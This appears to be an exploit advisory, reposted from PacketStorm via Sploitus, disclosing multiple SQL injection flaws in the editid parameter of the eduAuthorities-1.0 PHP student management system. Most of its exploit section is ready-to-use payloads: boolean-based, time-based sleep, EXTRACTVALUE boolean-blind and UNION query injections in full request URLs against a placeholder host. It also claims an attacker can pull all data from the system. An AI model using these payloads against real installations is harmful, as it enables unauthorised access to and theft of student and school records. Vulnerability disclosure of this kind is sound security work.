Share
## https://sploitus.com/exploit?id=PACKETSTORM:179919
## Titles: eduAuthorities-1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 07/29/2024  
## Vendor: https://www.mayurik.com/  
## Software:  
https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The editid parameter appears to be vulnerable to SQL injection attacks. The  
payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each  
submitted in the editid parameter. These two requests resulted in different  
responses, indicating that the input is being incorporated into a SQL query  
in an unsafe way. Note that automated difference-based tests for SQL  
injection flaws can often be unreliable and are prone to false positive  
results. You should manually review the reported requests and responses to  
confirm whether a vulnerability is actually present.  
Additionally, the payload (select*from(select(sleep(20)))a) was submitted  
in the editid parameter. The application took 20011 milliseconds to respond  
to the request, compared with 3 milliseconds for the original request,  
indicating that the injected SQL command caused a time delay.The attacker  
can get all information from the system by using this vulnerability!  
  
STATUS: HIGH- Vulnerability  
  
  
[+]Exploits:  
- SQLi Multiple:  
```mysql  
---  
Parameter: #1* (URI)  
Type: boolean-based blind  
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP  
BY clause (EXTRACTVALUE)  
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488  
OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#  
UiVZfrom(select(sleep(3)))a)  
  
Type: UNION query  
Title: MySQL UNION query (random number) - 3 columns  
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962  
UNION ALL SELECT  
8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)  
---  
```  
  
## Reproduce:  
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)  
  
## More:  
[href](  
https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)  
  
## Time spent:  
00:37:00